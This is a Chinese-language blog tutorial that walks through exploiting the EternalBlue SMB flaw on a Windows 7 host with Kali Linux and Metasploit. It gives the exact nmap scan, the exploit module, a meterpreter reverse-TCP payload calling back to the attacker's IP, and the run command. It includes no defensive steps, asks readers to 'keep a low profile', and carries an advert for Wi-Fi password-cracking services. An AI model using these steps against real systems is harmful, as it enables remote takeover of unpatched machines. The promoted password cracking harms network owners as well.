网络安全与Kali Linux:用MSF对Win7进行永恒之蓝攻防演练实战

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 握手包跑包

各位好 又见面了 我是曹操 今天给大家带来一篇新的教程

希望各位细心学习 低调用网

kali攻击命令kali攻击命令

一、基础知识介绍:

  1. 何为永恒之蓝?
    永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

  2. 什么是SMB协议?
    SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

二、攻击步骤:

  1. 确定攻击目标
    1.1 使用kali打开nmap扫描目标主机。使用nmap执行命令 nmap -sS -A 192.168.17.149 -sS(使用SYN扫描),-A(启用操作系统检测和版本检测)。

kali攻击命令

根据我们的扫描结果可以大致判断该系统可能存在永恒之蓝漏洞。

  1. 攻击步骤
    2.1 执行命令msfconsole打开metasploit。
    2.2 执行命令search ms17010查询我们所需要的攻击模块。
    2.3 找到我们需要的攻击模块后执行命令 use exploit/windows/smb/ms17
    010eternalblue
    2.4 执行命令search payload查找我们需要的payload。
    2.5 接下来我们利用该payload 执行命令set payload windows/x64/meterpreter/reverse
    tcp。
    2.6 执行命令show options来查看我们所需要设置的参数。其中RHOSTS(被攻击计算机IP)和LHOST(自己kali IP)是需要自己设置。

kali攻击命令kali攻击命令

2.7 执行命令:set LHOST 192.168.17.148,set RHOSTS 192.168.17.149即可。
2.8 在设置好一切之后只需要执行命令exploit即可自动开始攻击。出现截图中的回显时就表示已经攻击成功了。

kali攻击命令

赞(0)